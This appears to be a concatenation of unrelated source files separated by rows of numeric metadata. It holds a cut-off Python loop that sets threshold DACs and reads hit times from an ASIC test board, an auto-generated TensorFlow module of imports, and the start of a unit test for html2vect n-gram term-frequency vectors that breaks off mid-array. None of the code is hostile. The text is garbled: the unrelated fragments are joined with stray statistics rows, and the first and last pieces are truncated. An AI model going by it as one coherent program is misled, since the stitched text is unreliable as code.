hists_col = [[], [], []]
for threshold in thresholdCuts:
####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
hists = [[], [], []]
#print("Thresholds (system.feb.dac.dacPIXTHRaw): ", hex(threshold))
#system.feb.dac.dacPIXTHRaw.set(threshold)
#system.feb.dac.dacBLRaw.set(threshold+608)
if (vs == 'BL'):
system.feb.dac.dacBLRaw.set(threshold)
print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold), ':system.feb.dac.dacBL:', system.feb.dac.dacBL._rawGet())
else:
print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold), ':system.feb.dac.dacBLR:', system.feb.dac.dacBLR._rawGet())
system.feb.dac.dacBLRRaw.set(threshold)
# this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
# tests to report wrong times
time.sleep(2.0)
system.readAll()
for cnt in range(nCounts):
#time.sleep(0.1)
# start charge injection
system.feb.memReg.chargInjStartEventReg.set(0)
#system.feb.chargeInj.calPulseVar.set(1)
time.sleep(0.1)
system.readAll()
if system.feb.chargeInj.hitDetValid0._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
####hists_row[0].Fill(row_det)
####hists_col[0].Fill(col_det)
hists_row[0].append(row_det)
hists_col[0].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
print("row_det: ",row_det, ":col_det:", col_det, ":system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
else:
hists[0].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime0: ", float(-1))
if system.feb.chargeInj.hitDetValid1._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
####hists_row[1].Fill(row_det)
####hists_col[1].Fill(col_det)
hists_row[1].append(row_det)
hists_col[1].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
print("row_det: ",row_det, ":col_det:", col_det, ":system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
else:
hists[1].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime1: ", float(-1))
if system.feb.chargeInj.hitDetValid2._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
####hists_row[2].Fill(row_det)
####hists_col[2].Fill(col_det)
hists_row[2].append(row_det)
hists_col[2].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
print("row_det: ",row_det, ":col_det:", col_det, ":system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
else:
hists[2].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime2: ", float(-1))
allHists.append(hists)
return allHists
| 50.844208
| 186
| 0.632961
| 4,602
| 38,184
| 5.14472
| 0.061712
| 0.099595
| 0.095033
| 0.04663
| 0.90087
| 0.842414
| 0.822816
| 0.809132
| 0.786324
| 0.781889
| 0
| 0.031027
| 0.222606
| 38,184
| 750
| 187
| 50.912
| 0.766575
| 0.264456
| 0
| 0.740741
| 0
| 0
| 0.089958
| 0.042445
| 0
| 0
| 0.006976
| 0
| 0
| 1
| 0.034858
| false
| 0
| 0.013072
| 0
| 0.076253
| 0.106754
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1b84bf348a720ce474d4f69b46a722fd4b0f805
| 752
|
py
|
Python
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/tensorflow/_api/v2/compat/v2/__internal__/nest/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.__internal__.nest namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.util.nest import _sequence_like as sequence_like
from tensorflow.python.util.nest import flatten_up_to
from tensorflow.python.util.nest import get_traverse_shallow_structure
from tensorflow.python.util.nest import is_attrs
from tensorflow.python.util.nest import is_mapping
from tensorflow.python.util.nest import list_to_tuple
from tensorflow.python.util.nest import map_structure_up_to
from tensorflow.python.util.nest import yield_flat_paths
del _print_function
| 37.6
| 82
| 0.847074
| 116
| 752
| 5.206897
| 0.422414
| 0.238411
| 0.264901
| 0.317881
| 0.470199
| 0.470199
| 0.245033
| 0.125828
| 0
| 0
| 0
| 0
| 0.093085
| 752
| 19
| 83
| 39.578947
| 0.885631
| 0.230053
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.909091
| 0
| 0.909091
| 0.181818
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a1eaf1c850d95b5db71acf1ec9fd3f8b2b755e0a
| 41,201
|
py
|
Python
|
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vectors
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | 7
|
2017-08-31T22:45:46.000Z
|
2022-01-14T21:08:34.000Z
|
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vec
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | null | null | null |
html2vec/base/vectortypes/unit_tests/test_termslist2tfavgspeed.py
|
dpritsos/html2vec
|
be5629d6dc2665891472c5795c191286f0de31e7
|
[
"MIT"
] | null | null | null |
#
# Unit Test for html2vect.base.vectortypes.string2tf
#
# Author: Dimitiros Pritsos
#
# License: BSD Style
#
# Last update: Please refer to the GIT tracking
#
import sys
sys.path.append('../../../../')
import unittest
import numpy as np
import scipy.sparse as ssp
from html2vect.base.termstypes.cngrams import String2CNGramsList
from html2vect.base.termstypes.wngrams import String2WNGramsList
from html2vect.base.vectortypes.termslist2tfavgspeed import trms2tfspd_dict
class Test_BaseString2TF(unittest.TestCase):
def setUp(self):
self.s2ngl_c3grams = String2CNGramsList(n=3)
self.s2ngl_words = String2WNGramsList(n=1)
self.s2ngl_w3grams = String2WNGramsList(n=3)
self.txt_sample = "This is a unit test for html2tfd.charngrams.BaseString2TF class for html2vectors package/module"
self.txt_sample = "This This This aaa is a unit test for html2tfd.charngrams.BaseString2TF class aaa for html2vectors package/module"
#I could have the list of Char-3-grams and Word-3-grams, and/or Word-unigrams.
#However the above string will be conveted first to the proper terms list which is the functions' input.
#Terms-Indexs Vocabulary
self.c3grams_tid_vocab = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60, 'r h' : 61, 'ram' : 62, 'rin' : 63, 'rng' : 64, 'rs ' : 65,\
's a' : 66, 's f' : 67, 's i' : 68, 's p' : 69, 's.B' : 70, 'seS' : 71,\
'ss ' : 72, 'st ' : 73, 't f' : 74, 't t' : 75, 'tes' : 76, 'tfd' : 77,\
'tml' : 78, 'tor' : 79, 'tri' : 80, 'ule' : 81, 'uni' : 82, 'vec' : 83\
}
self.c3grams_tid_vocab_small = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60,\
}
self.c3grams_tid_vocab_large = {
' a ' : 0, ' cl' : 1, ' fo' : 2, ' ht' : 3, ' is' : 4, ' pa' : 5,\
' te' : 6, ' un' : 7, '.Ba' : 8, '.ch' : 9, '/mo' : 10, '2TF' : 11,\
'2tf' : 12, '2ve' : 13, 'Bas' : 14, 'F c' : 15, 'Str' : 16, 'TF ' : 17,\
'Thi' : 18, 'a u' : 19, 'ack' : 20, 'age' : 21, 'ams' : 22, 'arn' : 23,\
'ase' : 24, 'ass' : 25, 'cha' : 26, 'cka' : 27, 'cla' : 28, 'cto' : 29,\
'd.c' : 30, 'dul' : 31, 'e/m' : 32, 'eSt' : 33, 'ect' : 34, 'est' : 35,\
'fd.' : 36, 'for' : 37, 'g2T' : 38, 'ge/' : 39, 'gra' : 40, 'har' : 41,\
'his' : 42, 'htm' : 43, 'ing' : 44, 'is ' : 45, 'it ' : 46, 'kag' : 47,\
'l2t' : 48, 'l2v' : 49, 'las' : 50, 'ml2' : 51, 'mod' : 52, 'ms.' : 53,\
'ng2' : 54, 'ngr' : 55, 'nit' : 56, 'odu' : 57, 'or ' : 58, 'ors' : 59,\
'pac' : 60, 'r h' : 61, 'ram' : 62, 'rin' : 63, 'rng' : 64, 'rs ' : 65,\
's a' : 66, 's f' : 67, 's i' : 68, 's p' : 69, 's.B' : 70, 'seS' : 71,\
'ss ' : 72, 'st ' : 73, 't f' : 74, 't t' : 75, 'tes' : 76, 'tfd' : 77,\
'tml' : 78, 'tor' : 79, 'tri' : 80, 'ule' : 81, 'uni' : 82, 'vec' : 83,\
'aaa' : 84, 'bbb' : 85, 'ccc' : 86, 'ddd' : 87, 'eee' : 88, 'fff' : 89,\
'ggg' : 90, 'hhh' : 91, 'iii' : 92, 'jjj' : 93, 'kkk' : 94, 'lll' : 95\
}
self.words_tid_vocab = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7, 'html2tfd.charngrams.BaseString2TF': 8, 'class': 9, 'unit': 10\
}
self.words_tid_vocab_small = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7\
}
self.words_tid_vocab_large = {
'a': 1, 'for': 2, 'This': 3, 'is': 4, 'html2vectors': 5, 'test': 6,\
'package/module': 7, 'html2tfd.charngrams.BaseString2TF': 8, 'class': 9,\
'unit': 10, 'aaaword': 11, 'bbbword': 12, 'cccword': 13, 'dddword': 14\
}
self.w3grams_tid_vocab = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5, 'class for html2vectors' : 6,\
'a unit test' : 7, 'for html2tfd.charngrams.BaseString2TF class' : 8, 'for html2vectors package/module' : 9\
}
self.w3grams_tid_vocab_small = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5\
}
self.w3grams_tid_vocab_large = {
'This is a' : 1, 'unit test for' : 2, 'html2tfd.charngrams.BaseString2TF class for' : 3,\
'is a unit' : 4, 'test for html2tfd.charngrams.BaseString2TF' : 5, 'class for html2vectors' : 6,\
'a unit test' : 7, 'for html2tfd.charngrams.BaseString2TF class' : 8, 'for html2vectors package/module' : 9,\
'aa bb cc' : 10, 'ee ff gg' : 11, 'hh ii jj' : 12\
}
#Terms-Frequencies (python) Dictionaries
self.expected_c3grams_tf_dict = {
's i': 1, 't t': 1, 'ase': 1, 's a': 1, 'htm': 2, 'ram': 1, 'rs ': 1, 'TF ': 1, 's f': 1,\
'.ch': 1, 't f': 1, ' un': 1, '2tf': 1, 'l2t': 1, 'l2v': 1, 's p': 1, 'eSt': 1, 'tes': 1,\
'ge/': 1, 'ams': 1, 'or ': 2, 'cha': 1, 'est': 1, 'st ': 1, 'Str': 1, 'for': 2, 'tor': 1,\
' is': 1, 'ing': 1, 'cla': 1, 'e/m': 1, 'fd.': 1, 'ml2': 2, 'pac': 1, 'arn': 1, 'ngr': 1,\
'r h': 2, '2TF': 1, 'har': 1, 'is ': 2, 'tml': 2, 'F c': 1, 'ass': 1, 'tri': 1, 'g2T': 1,\
'his': 1, 'kag': 1, 'Bas': 1, '2ve': 1, 'tfd': 1, 'gra': 1, 'rng': 1, 'ors': 1, 'it ': 1,\
'odu': 1, 'mod': 1, ' pa': 1, 'ect': 1, 'ule': 1, 'Thi': 1, 's.B': 1, ' te': 1, '.Ba': 1,\
'nit': 1, 'las': 1, ' a ': 1, 'rin': 1, 'seS': 1, 'cka': 1, ' cl': 1, 'd.c': 1, 'dul': 1,\
'ack': 1, 'age': 1, ' ht': 2, 'ms.': 1, '/mo': 1, 'ng2': 1, 'ss ': 1, 'uni': 1, 'cto': 1,\
'vec': 1, ' fo': 2, 'a u': 1
}
self.expected_c3grams_tf_dict_smallVocab = {
'2TF': 1, 'ase': 1, 'htm': 2, '/mo': 1, 'TF ': 1, '.ch': 1, ' un': 1, '2tf': 1, 'l2t': 1,\
'l2v': 1, 'eSt': 1, 'ing': 1, 'ge/': 1, 'ams': 1, 'or ': 2, 'cha': 1, 'est': 1, 'Str': 1,\
'for': 2, ' is': 1, 'cla': 1, 'e/m': 1, 'fd.': 1, 'ml2': 2, 'pac': 1, 'arn': 1, 'ngr': 1,\
'gra': 1, 'har': 1, 'is ': 2, 'F c': 1, 'ass': 1, 'g2T': 1, 'his': 1, 'kag': 1, 'Bas': 1,\
'2ve': 1, 'ors': 1, 'it ': 1, 'odu': 1, 'mod': 1, ' pa': 1, 'ect': 1, 'Thi': 1, 'dul': 1,\
' te': 1, '.Ba': 1, 'nit': 1, 'las': 1, ' a ': 1, 'cka': 1, ' cl': 1, 'd.c': 1, 'ack': 1,\
'age': 1, ' ht': 2, 'ms.': 1, 'ng2': 1, 'cto': 1, ' fo': 2, 'a u': 1
}
self.expected_words_tf_dict = {
'a': 1, 'for': 2, 'This': 1, 'is': 1, 'html2vectors': 1, 'test': 1,\
'package/module': 1, 'html2tfd.charngrams.BaseString2TF': 1, 'class': 1, 'unit': 1
}
self.expected_words_tf_dict_smallVocab = {
'a': 1, 'for': 2, 'This': 1, 'is': 1, 'html2vectors': 1, 'test': 1,\
'package/module': 1\
}
self.expected_w3grams_tf_dict = {
'This is a' : 1, 'unit test for' : 1, 'html2tfd.charngrams.BaseString2TF class for' : 1,\
'is a unit' : 1, 'test for html2tfd.charngrams.BaseString2TF' : 1, 'class for html2vectors' : 1,\
'a unit test' : 1, 'for html2tfd.charngrams.BaseString2TF class' : 1, 'for html2vectors package/module' : 1\
}
self.expected_w3grams_tf_dict_smallVocab = {
'This is a' : 1, 'unit test for' : 1, 'html2tfd.charngrams.BaseString2TF class for' : 1,\
'is a unit' : 1, 'test for html2tfd.charngrams.BaseString2TF' : 1\
}
#Terms-Frequencies numpy.arrays
self.expected_c3grams_tf_arr = np.array( [
(' a ', 1.0), (' cl', 1.0), (' fo', 2.0), (' ht', 2.0), (' is', 1.0),\
(' pa', 1.0), (' te', 1.0), (' un', 1.0), ('.Ba', 1.0), ('.ch', 1.0),\
('/mo', 1.0), ('2TF', 1.0), ('2tf', 1.0), ('2ve', 1.0), ('Bas', 1.0),\
('F c', 1.0), ('Str', 1.0), ('TF ', 1.0), ('Thi', 1.0), ('a u', 1.0),\
('ack', 1.0), ('age', 1.0), ('ams', 1.0), ('arn', 1.0), ('ase', 1.0),\
('ass', 1.0), ('cha', 1.0), ('cka', 1.0), ('cla', 1.0), ('cto', 1.0),\
('d.c', 1.0), ('dul', 1.0), ('e/m', 1.0), ('eSt', 1.0), ('ect', 1.0),\
('est', 1.0), ('fd.', 1.0), ('for', 2.0), ('g2T', 1.0), ('ge/', 1.0),\
('gra', 1.0), ('har', 1.0), ('his', 1.0), ('htm', 2.0), ('ing', 1.0),\
('is ', 2.0), ('it ', 1.0), ('kag', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('las', 1.0), ('ml2', 2.0), ('mod', 1.0), ('ms.', 1.0), ('ng2', 1.0),\
('ngr', 1.0), ('nit', 1.0), ('odu', 1.0), ('or ', 2.0), ('ors', 1.0),\
('pac', 1.0), ('r h', 2.0), ('ram', 1.0), ('rin', 1.0), ('rng', 1.0),\
('rs ', 1.0), ('s a', 1.0), ('s f', 1.0), ('s i', 1.0), ('s p', 1.0),\
('s.B', 1.0), ('seS', 1.0), ('ss ', 1.0), ('st ', 1.0), ('t f', 1.0),\
('t t', 1.0), ('tes', 1.0), ('tfd', 1.0), ('tml', 2.0), ('tor', 1.0),\
('tri', 1.0), ('ule', 1.0), ('uni', 1), ('vec', 1)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_c3grams_tf_arr_Vocab = np.array( [
('s i', 1.0), ('t t', 1.0), ('ase', 1.0), ('s a', 1.0), ('htm', 2.0),\
('ram', 1.0), ('rs ', 1.0), ('TF ', 1.0), ('s f', 1.0), ('.ch', 1.0),\
('t f', 1.0), (' un', 1.0), ('2tf', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('s p', 1.0), ('eSt', 1.0), ('tes', 1.0), ('ge/', 1.0), ('ams', 1.0),\
('or ', 2.0), ('cha', 1.0), ('est', 1.0), ('st ', 1.0), ('Str', 1.0),\
('for', 2.0), ('tor', 1.0), (' is', 1.0), ('ing', 1.0), ('cla', 1.0),\
('e/m', 1.0), ('fd.', 1.0), ('ml2', 2.0), ('pac', 1.0), ('arn', 1.0),\
('ngr', 1.0), ('r h', 2.0), ('2TF', 1.0), ('har', 1.0), ('is ', 2.0),\
('tml', 2.0), ('F c', 1.0), ('ass', 1.0), ('tri', 1.0), ('g2T', 1.0),\
('his', 1.0), ('kag', 1.0), ('Bas', 1.0), ('2ve', 1.0), ('tfd', 1.0),\
('gra', 1.0), ('rng', 1.0), ('ors', 1.0), ('it ', 1.0), ('odu', 1.0),\
('mod', 1.0), (' pa', 1.0), ('ect', 1.0), ('ule', 1.0), ('Thi', 1.0),\
('s.B', 1.0), (' te', 1.0), ('.Ba', 1.0), ('nit', 1.0), ('las', 1.0),\
(' a ', 1.0), ('rin', 1.0), ('seS', 1.0), ('cka', 1.0), (' cl', 1.0),\
('d.c', 1.0), ('dul', 1.0), ('ack', 1.0), ('age', 1.0), (' ht', 2.0),\
('ms.', 1.0), ('/mo', 1.0), ('ng2', 1.0), ('ss ', 1.0), ('uni', 1.0),\
('cto', 1.0), ('vec', 1.0), (' fo', 2.0), ('a u', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_c3grams_tf_arr_smallVocab = np.array( [
('2TF', 1.0), ('ase', 1.0), ('htm', 2.0), ('/mo', 1.0), ('TF ', 1.0),\
('.ch', 1.0), (' un', 1.0), ('2tf', 1.0), ('l2t', 1.0), ('l2v', 1.0),\
('eSt', 1.0), ('ing', 1.0), ('ge/', 1.0), ('ams', 1.0), ('or ', 2.0),\
('cha', 1.0), ('est', 1.0), ('Str', 1.0), ('for', 2.0), (' is', 1.0),\
('cla', 1.0), ('e/m', 1.0), ('fd.', 1.0), ('ml2', 2.0), ('pac', 1.0),\
('arn', 1.0), ('ngr', 1.0), ('gra', 1.0), ('har', 1.0), ('is ', 2.0),\
('F c', 1.0), ('ass', 1.0), ('g2T', 1.0), ('his', 1.0), ('kag', 1.0),\
('Bas', 1.0), ('2ve', 1.0), ('ors', 1.0), ('it ', 1.0), ('odu', 1.0),\
('mod', 1.0), (' pa', 1.0), ('ect', 1.0), ('Thi', 1.0), ('dul', 1.0),\
(' te', 1.0), ('.Ba', 1.0), ('nit', 1.0), ('las', 1.0), (' a ', 1.0),\
('cka', 1.0), (' cl', 1.0), ('d.c', 1.0), ('ack', 1.0), ('age', 1.0),\
(' ht', 2.0), ('ms.', 1.0), ('ng2', 1.0), ('cto', 1.0), (' fo', 2.0),\
('a u', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr = np.array( [
('This', 1.0), ('a', 1.0), ('class', 1.0), ('for', 2.0),\
('html2tfd.charngrams.BaseString2TF', 1.0), ('html2vectors', 1.0),\
('is', 1.0), ('package/module', 1.0), ('test', 1.0), ('unit', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr_Vocab = np.array( [
('a', 1.0), ('for', 2.0), ('This', 1.0), ('is', 1.0), ('html2vectors', 1.0),\
('test', 1.0), ('package/module', 1.0), ('html2tfd.charngrams.BaseString2TF', 1.0),\
('class', 1.0), ('unit', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_words_tf_arr_smallVocab = np.array( [
('a', 1.0), ('for', 2.0), ('This', 1.0), ('is', 1.0), ('html2vectors', 1.0),\
('test', 1.0), ('package/module', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr = np.array( [
('This is a', 1.0), ('a unit test', 1.0), ('class for html2vectors', 1.0),\
('for html2tfd.charngrams.BaseString2TF class', 1.0), ('for html2vectors package/module', 1.0),\
('html2tfd.charngrams.BaseString2TF class for', 1.0), ('is a unit', 1.0),\
('test for html2tfd.charngrams.BaseString2TF', 1.0), ('unit test for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr_Vocab = np.array( [
('a unit test', 1.0), ('html2tfd.charngrams.BaseString2TF class for', 1.0),\
('test for html2tfd.charngrams.BaseString2TF', 1.0), ('class for html2vectors', 1.0),\
('for html2tfd.charngrams.BaseString2TF class', 1.0), ('is a unit', 1.0),\
('for html2vectors package/module', 1.0), ('This is a', 1.0), ('unit test for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
self.expected_w3grams_tf_arr_smallVocab = np.array( [
('is a unit', 1.0), ('test for html2tfd.charngrams.BaseString2TF', 1.0), ('unit test for', 1.0),\
('This is a', 1.0), ('html2tfd.charngrams.BaseString2TF class for', 1.0)\
],\
dtype=np.dtype([('terms', 'S128'), ('freq', 'float32')])\
)
#Frequencies scipy.sparse matrices
self.expected_c3grams_f_sparse_NoVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0\
],\
(np.zeros(84), np.arange(84))
),\
dtype=np.float32\
)
self.expected_c3grams_f_sparse_largeVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\
],\
(np.zeros(96), np.arange(96))
),\
dtype=np.float32\
)
self.expected_c3grams_f_sparse_smallVocab = ssp.csr_matrix(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0,\
],\
(np.zeros(61), np.arange(61))
),\
dtype=np.float32\
)
self.expected_words_f_sparse_Vocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(11), np.arange(11))\
), dtype=np.float32\
)
self.expected_words_f_sparse_smallVocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(8), np.arange(8))\
), dtype=np.float32\
)
self.expected_words_f_sparse_largeVocab = ssp.csr_matrix(
([ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],\
(np.zeros(15), np.arange(15))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_Vocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(10), np.arange(10))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_smallVocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
(np.zeros(6), np.arange(6))\
), dtype=np.float32\
)
self.expected_w3grams_f_sparse_largeVocab = ssp.csr_matrix(
([ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0 ],\
(np.zeros(13), np.arange(13))\
), dtype=np.float32\
)
#Frequencies numpy.arrays matrices
self.expected_c3grams_f_narray_Vocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
